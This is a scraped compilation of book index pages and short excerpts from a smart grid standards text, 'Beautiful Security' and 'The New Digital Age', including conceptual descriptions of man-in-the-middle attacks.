Index 460 Complementarities, 364, 371–373, 375 Component Interface Specification (CIS), 98, 101 Compressed Air Energy Storage (CAES), 146, 148 Concentrating Solar Power (CSP), 35, 44 Conceptual Reference Model (CRM), 339 Confidentiality, 301, 318, 342 Conventional backup capacity, 367, 368, 370, 373, 375, 384, 387 Co-production, 64 Counter (CTR), 307, 309 Control Center API (CCAPI), 97 Cybersecurity, 16, 18, 19, 342 Cyclic Redundancy Check (CRC), 310 Data Attribute (DA), 85 Data concentrator, 189 Data Link Layer (DLL), 303 Data Object (DO), 85 Decarbonizing scenarios, 357 Demand Response (DR), 183, 184, 259, 293 Demand Response and Load Control (DRLC), 187 Demand Response and Smart Grid Coalition (DRSG), 13 Denial of Service (DoS) attack, 301 Data Encryption Standard (DES), 312 Device Language Message Specification (DLMS), 191 Digital Subscriber Line (DSL), 266 Direct combustion, 68 Direct Load Control (DLC), 184 DISPOWER, 22, 159 Distributed Denial of Service (DDoS) attack, 301 Distributed Energy Resources (DERs), 145, 154, 248 Distributed power generation, 37 Distribution grid management, 344 Distribution Management System (DMS), 79 Eavesdropping, 301 ECHONET, 184, 224 EDGE, 287 EDISON, 25, 169 Electric Storage (ES), 145, 184, 187, 242 Electric Storage-Distributed Energy Resource (ES-DER), 151 Electric transportation, 342 Electric Vehicle (EV), 145, 184 Electric Vehicle Batteries (EVB), 164 Electric Vehicles (EV), 145 EMIX (Energy Market Information Exchange) 1.0, 187 Energy capacity, 364–370, 372, 375 Energy density, 164, 166 Energy dumping, 354, 364, 366, 369, 370, 384, 390 Energy Management System Application Program Interface (EMS-API), 98, 99 Energy Management Systems (EMS), 149, 186 Energy Service Interface (ESI), 149, 186, 208, 215 Energy storage, 379, 381, 382, 389 Energy-to-weight ratio, 164 Enhanced Geothermal System (EGS), 64 EtherCAT, 303, 324 Ethernet, 82, 84, 115 Ethernet powerlink, 303 EUC, 319 EU-DEEP, 159 EUI-64, 304, 309 European Committee for Electrotechnical Standardization (CENELEC), 8 European Committee for Standardization (CEN), 8 European Installation Bus (EIB), 235 EV-DO, 288 Fast DR, 184 Feeder Terminal Unit (FTU), 126 Fiber-to-the-home FTTH, 266 Framework Programme (FP), 159 Index Fuel cell, 56, 59, 60 Function set, 215 G3-PLC, 251, 262 G4V, 179 Gasification, 68 Generic Object Oriented Substation Event (GOOSE), 82 Generic Substation Event (GSE), 84 GEO satellite systems, 291 Geo-pressured, 64 Geothermal energy, 60, 63, 64 Geothermal ground, 64 Global smart grid federation, 14 GPRS, 287 Grid flexibility, 362, 364, 366, 387 Grid integration, 352, 374, 381 Grid to Vehicle (G2V), 146, 166 GridWise alliance (USA), 14 GridWise Architecture Council (GWAC), 12 Global System for Mobile Communication (GSM), 254, 272, 286, 287 Hidden terminal problem, 279 Highly elliptical orbit, 291 Home Area Network (HAN), 189, 214 Home Electronic System (HES), 184, 198 Home Energy Management System (HEMS), 227 Homegrid Forum (HGF), 12 HomePlug, 262 HomePlug AV HomePlug AV2, 263 Homeplug powerline alliance, 11 Highn speed packet access HSPA+, 286 Hypertext Transfer Protocol (HTTP), 105 Human Machine Interface (HMI), 84 Hybrid Electric Vehicles (HEVs), 163 Hydroelectric power, 37, 38, 40 Hydroelectric Pumped Storage (HPS), 146 Hydrogen, 59 Hydrogen fuel cell, 59 Hydropower, 35, 37 461 Hydropower plants, 38 Hydropower standards, 40 Hydrothermal, 64 IEC 60834, 106 IEC 60870, 88, 126 IEC 61508, 319 IEC 61850, 82 IEC 61968, 102 IEC 61970, 97, 125, 126 IEC 62351, 316 IEC 61784–3, 302 IEC SC65C/WG12, 301 IEDs, 82 IEEE 802.11, 254 IEEE 802.15.4, 304, 309 IEEE 802.22, 283 IETF, 312 iGREENGrid, 159 Internet Inter-ORB Protocol (IIOP), 105 IMT-advanced, 289, 290 India smart grid forum (India), 14 Information Exchange Model (IEM), 105 INSTEON, 235, 238 Institute of Electrical and Electronics Engineers (IEEE), 7 Integrity, 314, 318, 321, 342 Interchangeability, 330 Inter-control center communications protocol, 93 Interface Reference Model (IRM), 103 Intermittent renewable sources, 410 Internal Combustion Engines (ICE), 161 International Atomic Time (TAI), 309 International Electrotechnical Commission (IEC), 4 Telecontrol Application Service Element 2 (TASE.2), 93 International Energy Agency (IEA), 12 International Organization for Standardization (ISO), 6 International Telecommunication Union (ITU), 7 Internet Engineering Task Force (IETF), 2 Internet protocol, 257 Index 462 Interoperability, 248 IPsec, 213 IRED, 159 ISA100.11a, 278 ISO 9506, 95 ISO/OSI, 87 NB-PLC, 259 Near field communication, 274 Netricity, 251 Network energy capacity, 367, 368 Network Layer (NL), 303 Non-repudiation, 318 Japan smart community alliance, 14 Object Identification System (OBIS), 192 ONE-NET, 238 OPC UA, 324 OpenHAN 2.0, 217 Open V2G, 179 Operational policy, 372, 373 Optical fiber networks, 264 Organization for the Advancement of Structured Information Standards (OASIS), 11 Out-Of-Band (OOB), 304 KNX, 261 LEO satellite system, 291 Local Area Networks (LANs), 82 Logic Device (LD), 85 Logic Node (LN), 85 LONMARK, 234 LONTALK, 233 LONWORKS, 233 LTE Long term evolution, 289 Machine-to-machine M2M, 269 MACsec, 311 Man-in-the-middle attack, 301 Manufacturing Message Specification (MMS), 82 Master Data Telegram (MDT), 313 MERGE, 179 Meter Data Management System (MDMS), 189 MHR, 309 MIC, 305, 307 MICROGRIDS, 159 MMIC, 322 MOLECULES, 179 Molten Carbonate Fuel Cell (MCFC), 155 Multimode, 264 Passive optical networks, 252 Payload Data Unit (PDU), 307 Phase Change Materials (PCMs), 150 Photovoltaic (PV), 35 PKI, 319 Plug-in Electric Vehicle (PEV), 177, 187 Plug-in Hybrid Electric Vehicles (PHEVs), 147 Power capacity, 364–366, 369, 372 Power control center, 80 Power grid, 79 Power line communication, 263 Power-to-weight ratio, 164 PRIME, 261 Process layer, 84 PROFIBUS/PROFINET, 311 PROFIsafe, 302 Proton Exchange Membrane Fuel Cell (PEMFC), 155 Pumped Hydro Storage (PHS), 146, 147 Narrowband PLC, 251, 260 National Electrical Manufactures Association (NEMA), 11 National Institute of Standards and Technology (NIST), 7, 264 Radio frequency identification RFID, 270 Range anxiety, 161 Registration Process (RP), 221 RPL, 258, 259, 283 Index Safety integrity level, 322 Sampled Measured Values (SMV), 82 Sampling value (SV), 85 Satellite communication, 291 SCL, 111, 112 SDH, 265 Single-mode, 264, 265 Slow DR, 184 Smart Energy Profile (SEP) 2.0, 187 Smart Grid Interoperability Panel (SGIP), 14 Smart home and building automation, 183, 197 Society of Automotive Engineers (SAE) international, 7 Solar energy, 40 Solid Oxide Fuel Cell (SOFC), 155 SONET, 265 Specific Communication Service Mapping (SCSM), 84 Storage design and dispatch, 366 Storage usefulness, 365 Substation, 84–85 Substation layer, 84 Superconducting Magnetic Energy Storage (SMES), 147 Supervisory Control and Data Acquisition (SCADA), 80 SWITCH, 357 Symmetric channel model (BSC), 111 System Interface Exchange Descriptions (SIED), 128 TCP/IP, 79 Technical Committee 57 (TC57), 82 Telecommunications Industry Association (TIA), 8 Thermal Energy Storage (TES), 150 Time stamp, 310 UCA International Users Group (UCAIug), 10 Ultra capacitors, 150 UMTS, 288 463 Unified Modeling Language (UML), 174 United States Advanced Battery Consortium (USABC), 164 Unlicensed spectrum, 275, 283 Variability, 354, 356, 372, 375 Vehicle-to-Grid (V2G), 170 Very high penetration, 384 Virtual Consecutive Number (VCN), 316 Virtual End Node (VEN), 187 Virtual Power Plant (VPP), 145 Virtual Private Network (VPN), 318 Virtual Top Node (VTN), 189 Virus, 318 VSAT Very small aperture terminal, 292 WAVE2M, 258 WCDMA Wideband CDMA, 288 Weightless, 283 Wide Area Networks (WANs), 205 Wide Area situational awareness, 341 Wi-Fi, 9 Wi-Fi alliance, 9 WiMAX 10 IEEE 802.16, 290 Wind energy, 51, 54 Wind turbine, 52 Wired communication, 321, 322 Wireless standards, 268 Wireless technologies, 270 WirelessHART, 278 Worldwide Interoperability for Microwave Access (wimax) forum, 10 X10, 235, 239 XML, 128 ZigBee, 277 ZigBee alliance, 10 ZigBee Home Automation (ZHA), 228 Z-Wave, 221, 224, 333 WILEY END USER LICENSE AGREEMENT Go to www.wiley.com/go/eula to access Wiley’s ebook EULA.


pages: 302 words: 82,233

Beautiful security by Andy Oram, John Viega

Albert Einstein, Amazon Web Services, business intelligence, business process, call centre, cloud computing, corporate governance, credit crunch, crowdsourcing, defense in depth, Donald Davies, en.wikipedia.org, fault tolerance, Firefox, loose coupling, Marc Andreessen, market design, MITM: man-in-the-middle, Monroe Doctrine, new economy, Nicholas Carr, Nick Leeson, Norbert Wiener, optical character recognition, packet switching, peer-to-peer, performance metric, pirate software, Robert Bork, Search for Extraterrestrial Intelligence, security theater, SETI@home, Silicon Valley, Skype, software as a service, statistical model, Steven Levy, The Wisdom of Crowds, Upton Sinclair, web application, web of trust, zero day, Zimmermann PGP

Remember the security warning that popped up about the certificate? The warning popped up because any traffic being encrypted was actually being decrypted at my laptop, not at the final destination as the user assumes. In other words, they’re running a secure, encrypted connection just as they want—except the encryption is using my certificate and I can trivially decrypt the data again. As the man in the middle, I can decrypt users’ data, record everything, and then reencrypt it and pass it along to its final destination. I could record usernames, passwords, email messages, and other potentially confidential information that the victim assumed was being passed securely to a trusted destination. Even a small slice of your personal networking traffic can open a chink for serious identity attacks. Say, for example, that I gain access only to your email account.

However, they have never been trained professionally about the Internet and its risks, nor do they work for a corporation that has engineers dedicated to making sure employees understand what all the security warnings mean. Instead they have felt their way through the process and have just enough knowledge to pay their bills online and check their stock portfolio. Something like a digital certificate makes about as much sense to them as a proton accelerator. On the other hand, I find technically savvy people who have a comprehensive understanding not only of digital certificates but also of man-in-the-middle attacks. One might think these people would never fall for such a scam, but on the contrary, I have found that even these people are quick to fall victim. The reason is that—unlike my parents, who don’t understand anything—the experts understand it so well that they rationalize what is taking place. For example, when the security alert pops up their first assumption is that the administrator for the WiFly site has dropped the ball and didn’t renew her expired certificate.

Brazos, 206 Gutmann, Peter, 117 H handshakes, 28 Hannaford Brothers security breach, 67, 68, 211 hash algorithms data translucency and, 241 LAN Manager, 4 SET procedure, 78 INDEX 273 Windows NT, 5 Hasselbacher, Kyle, 127 health care field infosecurity and, 208 security metrics, 34–38 Health Insurance Portability and Accountability Act (HIPAA), 80, 214 hierarchical trust cumulative trust comparison, 110 defined, 109 HijackThis change tracker, 92 HIPAA (Health Insurance Portability and Accountability Act), 80, 214 HIPS (Host-based Intrusion Prevention Systems), 253 Holz, Thorsten, 145 Homeland Security, Department of, 36 honeyclients defined, 133 future of, 146 implementation limitations, 143 open source, 133–135 operational results, 139–140 operational steps, 134, 137 related work, 144–145 second-generation, 135–138 storing and correlating data, 140 honeymonkeys, 144 Honeynet Project, 138, 145 honeypot systems defined, 133 proliferation of malware, 252 Honeywall, 138 host logging, 232–237 Host-based Intrusion Prevention Systems (HIPS), 253 hostile environments confirmation traps and, 10 specialization in, 249 hotspot services, 22 House Committee on Homeland Security, 201 Howard, Michael, 195 HTTPS protocol, 66 Hubbard, Dan, 144 Hula Direct ad broker, 98, 99 I IBM, social networking and, 159 IDEA (International Data Encryption Algorithm), 117, 118 iDefense Labs, 59, 156 identity certificates, 111 identity management services, 154 identity theft devaluing credit card information, 71 274 INDEX wireless networking, 23–25 IDS (intrusion detection system) building a resilient model, 233–237 challenges detecting botnets, 231 false positives, 217 functionality, 226 honeyclient support, 133, 144 host logging, 232–237 host-based, 253 improving detection with context, 228–231 limitations, 227, 229 log handling considerations, 218 Iframedollars.biz, 132 incident detection, 233 (see also malicious attacks) building a resilient model, 233–237 host logging and, 232–237 improving with context, 228–231 percentage identified, 226, 227 SQL Slammer worm, 225 InCtrl change tracker, 92 information dealers defined, 64 IRC data exchange, 67 malware producers and, 64 sources of information, 68 information security as long tail market, 165–167 balance in, 202–207 basic concepts, 200 cloud computing, 150–154 communication considerations, 207–211 connecting people and processes, 154–158 doing the right thing, 211–212 historical review, 248–251 host logging, 232 need for new strategies, 247 organizational culture, 200–202 overview, 147–150 September 11, 2001 and, 249 social networking and, 158–162 strict scrutiny, 252–254 suggested practices, 257 supercrunching, 153, 162–164 taking a security history, 44–46 web services, 150–154 Information Security Economics, 162–164 Information Security Group, 168 injected iFrames, 69 International Data Encryption Algorithm (IDEA), 117, 118 International Tariff on Arms Regulations (ITAR), 3 Internet Explorer exploit-based installs and, 92 open source honeyclients, 134 recent vulnerabilities, 131 Internet Relay Chat (see IRC) intranets, security flaws, 25 introducers in PGP, 113 (see also certificate authorities) defined, 109, 112 extended, 123 Web of Trust process, 113 intrusion detection system (see IDS) investment metrics, 47 IRC (Internet Relay Chat) botnet communication, 66 cyber underground communication, 65, 67 ISO 2700x standard, 214 ISPs, costs versus profits, 16–17 ITAR (International Tariff on Arms Regulations), 3 ITIL regulation, 214 iTunes, 165 J J/Secure, 76 JCB International, 76 Jericho Forum, 156 Jerusalem virus, 248 K Kaminsky, Dan, 161 KBA (knowledge-based authentication), 68 key loggers as information source, 68 specialization in, 249 key signatures bloat and harassment, 124 certificate support, 111 exportable, 125 freshness considerations, 122 in-certificate preferences, 126 Web of Trust, 113, 115, 120 keyrings, 112 keys (see certificates; public key cryptography) keyservers defined, 112 key-editing policies, 126 PGP Global Directory, 127 Klez virus, 248 knowledge-based authentication (KBA), 68 Kovah, Xeno, 138 L L0phtCrack government interest in, 13 learned helplessness example, 3–6 Lai, Xuejia, 117 LAN Manager, 4 Lancaster, Branko, 117 Langevin, Jim, 201 LANs, physical security inherent in, 28 Lansky, Jared, 90–92 learned helplessness backward compatibility and, 2 defined, 2, 7 L0phtCrack example, 3–6 overview, 2–7 Leeson, Nick, 38–49 legacy systems backward compatibility, 7 e-commerce security and, 74 end-of-life upgrades, 2, 7 password security and, 4–6 legal considerations balance in information security, 202–207 communication and information security, 207– 211 doing the right thing, 211–212 information security concepts, 200 log handling, 223 organizational culture, 200–202 value of logs, 214 Levy, Steven, 119 LinkShare affiliate network, 102 Linux systems, 221 log management tools, 222–223 log messages, 215 logs case study, 218–221 challenges with, 216–218 classifying, 214 database, 221 defined, 215 email tracking, 221 future possibilities, 221–223 host logging, 232–237 incident detection and, 226, 228 regulatory compliance and, 214 universal standard considerations, 217 usefulness of, 153, 214, 215 long straddle trading strategy, 40 Lucent (see Bell Labs) Lynch, Aidan, 144 M machine learning, 254 malicious attacks, 228 (see also cyber underground; incident detection) attack indicators, 233–237 Blaster, 248 INDEX 275 Code Red, 248 confirmation traps, 10 directionality of, 227 energy companies vulnerabilities, 18 identity theft, 22–28 Jerusalem, 248 Klez, 248 Melissa, 248 Michelangelo, 248 Morris, 248 MyDoom, 248 Nimda, 248 Pakistani Flu, 248 Slammer, 248 Snort signatures, 228 Sober, 248 Sobig, 248 SQL Slammer worm, 225–227, 229 Symantec reports on, 229 VBS/Loveletter—“I Love you”, 248 W32.Gaobot worm, 229 malvertisements, 92–94 malware anti-virus software and, 251 as cyber attack method, 69 banking trojans, 141, 249 client-side exploitation, 15, 132, 141–143 common distribution methods, 69 current market values, 67 directionality of attacks, 227 gaming trojans, 141, 249 historical review, 248–249 polymorphic, 70 production cycle, 64 streamlining identification of, 254 targeted advertising, 250 testing, 65 zero-day exploits, 252 malware producers defined, 64 information dealers and, 64 polymorphic malware, 70 testing code, 65 man-in-the-middle attacks, 25 manual penetration testing, 190 Massey, James, 117 MasterCard 3-D Secure protocol, 76 SET protocol, 78 Maurer, Ueli, 128 MBNA, 79 McAfee online safety survey, 187 SiteAdvisor, 97 vulnerability management, 152 276 INDEX McBurnett, Neal, 128 McCabe, Jim, 178, 179 McCaul, Mike, 201 McDougle, John, 178 McGraw, Gary, 186 McManus, John, 171–182 Mean Time Between Security Incidents (MTBSI), 48 Mean Time to Repair (MTTR), 58 Mean Time to Repair Security Incidents (MTTRSI), 48 Media Guard product, 94 medical field infosecurity and, 208 security metrics, 34–38 Melissa virus, 248 Merchant Server Plug-in (MPI), 77 meta-introducers, 123 metrician, 34 metrics Barings Bank security breach, 38–49 coverage, 46 for data responsibility, 72 health care field, 34–38 investment, 47 measuring ROI, 163 scan coverage, 58 software development lifecycle and, 172–174, 189 TJX security breach, 49–59 treatment effect, 48 MetricsCenter technology, 45 MetricsCenter.org, 54 Michelangelo virus, 248 microchunking, 166 Microsoft, 134 (see also Internet Explorer) Authenticode, 110 Azure cloud operating system, 152 Commission on Cyber Security, 201 CPC advertising, 100 hierarchical trust, 110 honeymonkeys, 144 L0phtCrack example, 3–6 security controls in SDLC, 194 SQL Server, 225 supporting legacy systems, 7 testing approach, 10 Unix systems and, 8 MITRE Corporation, 135, 222 money, 44, 70, 141 (see also financial institutions; PCI) Monroe Doctrine, 201 Morris virus, 248 mothership systems, 230 Motorola Corporation, 31 Mozilla Firefox honeyclient support, 140, 145 malware exploits and, 141 MPI (Merchant Server Plug-in), 77 MTBSI (Mean Time Between Security Incidents), 48 MTTR (Mean Time to Repair), 58 MTTRSI (Mean Time to Repair Security Incidents), 48 Murray, Daragh, 144 MyDoom virus, 248 MySpace social network, 159 N naïveté client counterpart of, 8–9 learned helplessness and, 2–7 NASA background, 171 perception of closed systems, 172 software development lifecycle, 172–174, 178– 181 National Institute for Standards, 159 National Office for Cyberspace (NOC), 201, 202 Nazario, Jose, 145 newsgroups, 250 Nichols, Elizabeth, 33–61 Nichols, Elizabeth A., 30 Nimda virus, 248 NOC (National Office for Cyberspace), 201, 202 NTLM authentication, 6 O OCC, 191 off-the-shelf software (see software acquisition) Office Max, 50 online advertising advertisers as victims, 98–105 attacks on users, 89–98 CPA advertising, 102–103 CPC advertising, 100–101 CPM advertising, 100–103 creating accountability, 105 deceptive ads, 94–98 exploit-laden banner ads, 89–92 false impressions, 98–99 fighting fraud, 103–104 malvertisements, 92–94 special procurement challenges, 104 targeted, 250 online advertising, targeted, 249 online forums, 250 Open Security Foundation, 55 open source honeyclients, 133–135 Open Web Application Security Project (see OWASP) OpenID identity management, 154 OpenPGP standard/protocol background, 108 certification support, 111, 112 designated revokers, 122 direct trust, 109 exportable signatures, 125 extended introducers, 123 in-certificate preferences, 126 key support, 112 key-editing policies, 126 revoking certificates, 122 OpenSocial API, 159 operating systems, host logging, 232, 236 OptOut spyware removal tool, 251 Orange Book, 213 organizational culture, 200–202 outsourcing extending security initiative to, 190 trends in, 154 vulnerability research, 156 OWASP (Open Web Application Security Project) background, 159 CLASP methodology, 187 Top 10 list, 187 P P2P (peer-to-peer) networks botnet communication, 66 honeyclient considerations, 146 packet sniffers, 92 packets handshake, 28 SQL Slammer worm, 227 Pakistani Flu virus, 248 PAN (Primary Account Number), 77 Panda Labs, 69 PAR (Payer Authentication Request), 77 PARAM tag, 94 passive sniffing, 9 passphrases, 29 password grinding, 28 password-cracking tools L0phtCrack example, 3–6 passphrases and, 29 passwords authentication security, 7 identity theft and, 24 NTLM authentication and, 6 PATHSERVER, 129 Payer Authentication Request (PAR), 77 Payment Card Industry (see PCI) INDEX 277 PayPal, 79 PCI (Payment Card Industry) Data Security Standard, 75, 82, 159, 211, 214, 237 protecting credit card data, 44 peer-to-peer networks (see P2P networks) PEM (Privacy Enhanced Mail), 117 perma-vendors, 156 Personally Identifiable Information (PII), 180 Pezzonavante honeyclient, 144 PGP (Pretty Good Privacy), 111 (see also Web of Trust) background, 107, 108, 116 backward compatibility issues, 117 Crypto Wars, 118 designated revokers, 122 encryption support, 107, 116–120 key validity, 108 patent and export problems, 117 source download, 116 trust models, 109–116 trust relationships, 108 PGP Corporation, 108 PGP Global Directory, 127 pharmware, 68 phishing 3-D Secure protocol, 77 as information source, 68 botnet support, 66 challenges detecting, 231 spam and, 70 specialization in, 249 PhoneyC website, 145 PII (Personally Identifiable Information), 180 Piper, Fred, 168 PKI (Public Key Infrastructure) authoritative keys, 123 defined, 111 DSG support, 203 revoking certificates, 120 SET considerations, 79 PlexLogic, 45 Plumb, Colin, 119 port scanning, 231 pragmatic security, 200, 209 Pre-Shared Key (PSK), 28 Pretty Good Privacy (see PGP) Price, Will, 127 Primary Account Number (PAN), 77 Privacy Enhanced Mail (PEM), 117 proof-of-concept project, 191–193 Provos, Niels, 145 PSK (Pre-Shared Key), 28 psychological traps confirmation traps, 10–14 278 INDEX functional fixation, 14–20 learned helplessness, 2 public key cryptography cumulative trust systems, 111 key revocation, 121 PGP support, 107 RSA algorithm, 117 SET support, 78 steganographic applications, 245 validity, 108 Public Key Infrastructure (see PKI) Public Key Partners, 118 put options, 39 Q Qualys vulnerability management, 151 R Raduege, Harry, 201 Regular, Bob, 90 regulatory compliance (see legal considerations) Reiter, Mark, 129 Reliable Software Technologies, 171, 173 reputation economy, 167 resource dealers, 64 Return on Investment (ROI), 163, 205–207 Return on Security Investment (ROSI), 206 Returnil, 254, 255, 256, 257 revoking certificates, 120–122 RFC 1991, 108, 119 RFC 3156, 108 RFC 4880, 108 Right Media, 94 ROI (Return on Investment), 163, 205–207 root certificates defined, 109 direct trust, 110 rootkits example investigating, 220 Rustock.C, 252 specialization in, 249 ROSI (Return on Security Investment), 206 routers DDoS attacks on, 16 host logging, 232 watch lists, 231 Routh, Jim, 183–197 RSA Data Security Incorporated, 117 RSA public-key algorithm, 117 RSAREF library, 117 Rustock.C rootkit, 252 S Sabett, Randy V., 199–212 sandboxing functionality, 254 HIPS support, 253 need for new strategies, 248 Santa Fe Group, 44 Sarbanes-Oxley Act (SOX), 80, 214 SCADA systems, 18 Schoen, Seth, 127 SDLC (see software development lifecycle) Second Life virtual world, 159 Secret Service Shadowcrew network and, 65 TJX security breach and, 50 Secunia, 156 Secure Electronic Transaction (see SET) security breaches attorney involvement in investigating, 211 Barings Bank, 38–49 California data privacy law, 203–205 cyber underground and, 63–72 databases and, 239 impact of, 208 logs in investigating, 218–221 public data sources, 59 tiger team responses, 210–211 TJX, 49–59 security certificates defined, 22 encryption and, 22, 24 fundamental flaw, 25 paying attention to, 26 wireless access points, 26, 27 Security Event Managers (SEMs), 153 security metrics (see metrics) Security Metrics Catalog project, 54 security traps (see psychological traps) SecurityFocus database, 132 SecurityMetrics.org, 54 SEI (Software Engineering Institute), 176 Seifert, Christian, 138, 145 self-signed certificates, 109 SEMs (Security Event Managers), 153 separation of duties, 39 September 11, 2001, 249 server applications, host logging, 232 Service Set Identifier (SSID), 52 service-oriented architecture (SOA), 150 SET (Secure Electronic Transaction) background, 78 evaluation of, 79 protections supported, 78 transaction process, 79 SHA256 hash algorithm, 241 Shadowcrew network, 65 short straddle trading strategy, 39, 40 signature harassment, 125 Sinclair, Upton, 149 Skinner, B.


pages: 525 words: 116,295

The New Digital Age: Transforming Nations, Businesses, and Our Lives by Eric Schmidt, Jared Cohen

access to a mobile phone, additive manufacturing, airport security, Amazon Mechanical Turk, Amazon Web Services, anti-communist, augmented reality, Ayatollah Khomeini, barriers to entry, bitcoin, borderless world, call centre, Chelsea Manning, citizen journalism, clean water, cloud computing, crowdsourcing, data acquisition, Dean Kamen, drone strike, Elon Musk, failed state, fear of failure, Filter Bubble, Google Earth, Google Glasses, hive mind, income inequality, information trail, invention of the printing press, job automation, John Markoff, Julian Assange, Khan Academy, Kickstarter, knowledge economy, Law of Accelerating Returns, market fundamentalism, means of production, MITM: man-in-the-middle, mobile money, mutually assured destruction, Naomi Klein, Nelson Mandela, offshore financial centre, Parag Khanna, peer-to-peer, peer-to-peer lending, personalized medicine, Peter Singer: altruism, Ray Kurzweil, RFID, Robert Bork, self-driving car, sentiment analysis, Silicon Valley, Skype, Snapchat, social graph, speech recognition, Steve Jobs, Steven Pinker, Stewart Brand, Stuxnet, The Wisdom of Crowds, upwardly mobile, Whole Earth Catalog, WikiLeaks, young professional, zero day

One of the most insidious forms of cyber attack that P2P users can encounter is known as a “man-in-the-middle” attack, a form of active eavesdropping. In this situation a third-party attacker inserts himself between two participants in a conversation and automatically relays messages between them, without either participant realizing it. This third party acts like an invisible intermediary, having tricked each participant into believing that the attacker is actually the other party of the conversation. So as the conversation occurs (whether through text, voice or video), that third-party attacker can sit back and watch, occasionally siphoning off information and storing it elsewhere. (Or, more maliciously, the attacker could insert false information into the conversation.) Man-in-the-middle attacks occur in all protocols, not just peer-to-peer, yet they seem all the more malicious in P2P communications simply because people using those platforms believe they are secure.

Hormuud https encryption protocols Huawei human rights, 1.1, 3.1 humiliation Hussein, Saddam, itr.1, 7.1, 7.2, 7.3, 7.4 Hutus Identity Cards Act identity theft identity-theft protection, 2.1, 2.2 IEDs (improvised explosive devices), 5.1, 6.1 IEEE Spectrum, 107n income inequality, 1.1, 4.1 India, 2.1, 2.2, 3.1 individuals, transfer of power to Indonesia infiltration information blackouts of exchange of free movement of see also specific information technologies Information and Communications Technologies Authority Information Awareness Office information-technology (IT) security experts infrastructure, 2.1, 7.1 Innocence of Muslims (video), 4.1, 6.1 innovation Institute of Electrical and Electronics Engineers, n insurance, for online reputation integrated clothing machine intellectual property, 2.1, 3.1 intelligence intelligent pills internally displaced persons (IDP), 7.1, 7.2 International Criminal Court, 6.1, 7.1, 7.2 internationalized domain names (IDN) International Telecommunications Union Internet, 2.1, 6.1, 6.2, 6.3, 6.4 Balkanization of as becoming cheaper and changing understanding of life impact of as network of networks Internet asylum seekers Internet Corporation for Assigned Names and Numbers (ICANN) internet protocol (IP) activity logs internet protocol (IP) address, 3.1, 3.2, 6.1 Internet service provider (ISP), 3.1, 3.2, 6.1, 7.1 Iran, 2.1, 2.2, 3.1, 3.2, 3.3, 3.4, 3.5, 3.6, 4.1, 4.2, 5.1, 6.1, 6.2, 6.3, 7.1 cyber warfare on “halal Internet” in Iraq, itr.1, 3.1, 4.1, 6.1, 6.2 reconstruction of, 7.1, 7.2 Ireland iRobot Islam Israel, 3.1, 3.2, 3.3, 3.4, 6.1, 6.2, 6.3 iTunes Japan, 3.1, 6.1n, 246 earthquake in Jasmine Revolution JavaOne Conference Jebali, Hamadi Jibril, Mahmoud Jim’ale, Ali Ahmed Nur Join the Club: How Peer Pressure Can Transform the World (Rosenberg), 4.1 Joint Tactical Networking Center Joint Tactical Radio System Julius Caesar justice system Kabul Kagame, Paul, 7.1, 7.2 Kansas State University Karzai, Hamid Kashgari, Hamza Kaspersky Lab Kenya, 3.1, 7.1, 7.2 Khan Academy Khartoum Khodorkovsky, Mikhail Khomeini, Ayatollah Kickstarter kidnapping, 2.1, 5.1 virtual Kinect Kissinger, Henry, 4.1, 4.2 Kiva, 7.1, 7.2, 7.3 Klein, Naomi, n Kony 2012, 7.1 Koran Koryolink “kosher Internet,” 187 Kosovo Kurds, 3.1, 3.2, 4.1 Kurzweil, Ray Kyrgyzstan Laârayedh, Ali Lagos language translation, 1.1, 4.1, 4.2 laptops Latin America, 3.1, 4.1, 4.2, 5.1 law enforcement Law of Accelerating Returns Lebanon, 5.1, 7.1, 7.2 Lee Hsien Loong legal options, coping strategies for privacy and security concerns legal prosecution Lenin, Vladimir Levitt, Steven D. Libya, 4.1, 4.2, 4.3, 6.1, 7.1, 7.2 life expectancy Lindhout, Amanda LinkedIn Link Egypt litigation lobbying groups Lockhart, Clare, n Lockheed Martin Lord’s Resistance Army loyalties, 2.1, 2.2 LulzSec Maasai, 1.1, nts.1 McAfee, John McChrystal, Stanley Malaysia, 3.1, 4.1, 6.1n Mali, 2.1, 7.1 malware state-initiated, 2.1, 2.2 Mandela, Nelson “man-in-the-middle” attacks Manning, Bradley Mao Zedong MasterCard, 5.1, 5.2 Mauritania, 3.1, 3.2 Mbeki, Thabo MCI Mechanical Turk media: disaggregated mainstream media cycles medicine Megaupload Mehr, 95 memory prosthetics Mexico, 2.1, 5.1, 6.1 microblogs microphones Microsoft, 1.1, 3.1, 3.2 Middle East military-industrial complex Milošević, Slobodan mine-resistant, ambush-protected (MRAP) vehicles Ministry of Posts and Telecommunications, North Korea minority groups, 6.1, con.1 Minority Report (film), 1.1 misinformation, 3.1, 3.2, 6.1 MIT Media Lab Mitnick, Kevin, n Mobile Giving Foundation “mobile health” revolution mobile money credits mobile phones, 1.1, 4.1, 5.1, 5.2, 5.3, 7.1, 7.2, con.1 banned in Iraq in Congo education and health and see also smart phones Money for Good report, nts.1 Mongolia Monopoly (film), 4.1 monuments Moore’s Law, itr.1, con.1 moral sense Moro Islamic Liberation Front Morsi, Mohamed Motorola MTC-Vodafone Mubarak, Hosni, 3.1, 3.2, 4.1, 4.2, 4.3, 7.1 Mugabe, Robert multilayer backup systems Mumbai attacks Mundie, Craig, 3.1, 3.2, 3.3 Muslim Brotherhood, 4.1, 4.2, 4.3 Mutua, Anthony myths names, 2.1, nts.1 Napster narco-terrorists, 5.1, 5.2 nasal implants Natanz nuclear enrichment facility National Security Agency (NSA) National Security Law National Transitional Council (NTC) NATO, 3.1, 4.1, 5.1, 6.1, 6.2, 6.3 Navalny, Alexei Navy SEAL Team Six, 5.1, 5.2 Nawaz, Maajid near-permanent data storage Neda video, 6.1, 6.2 Netflix Netherlands net neutrality Nevada New York City subway, n New York Times, 33, 3.1, 3.2, 4.1, 5.1, 7.1 New York Times Magazine, 197 NGO Ratings Nigeria Nightmare Nixon, Richard noise Nokia Siemens Networks (NSN) nongovernmental organizations (NGOs), 1.1, 2.1, 2.2, 3.1, 6.1, 7.1, 7.2, 7.3, 7.4, 7.5, 7.6, 7.7, con.1, nts.1 nonprofits non-state actors, coping strategies for privacy and security concerns Noor Group, n North Korea, 2.1, 3.1, 3.2, 3.3 Northrop Grumman Norway Nuclear Nonproliferation Treaty Obama, Barack, 3.1, 3.2, 6.1 unauthorized leaks and official profiles Ohio State University Olympic Games (attack code name) One World Trust online cadastral systems online reputations active management of black markets in insurance for open networks open-source movement open-source software, 6.1, 7.1 Operation Avenge Assange optimism options Orascom, 3.1, 3.2 Otpor Ottoman empire, 6.1, 7.1 outsourcing oversights OxOmar PackBot Pakistan, 3.1, 3.2, 4.1, 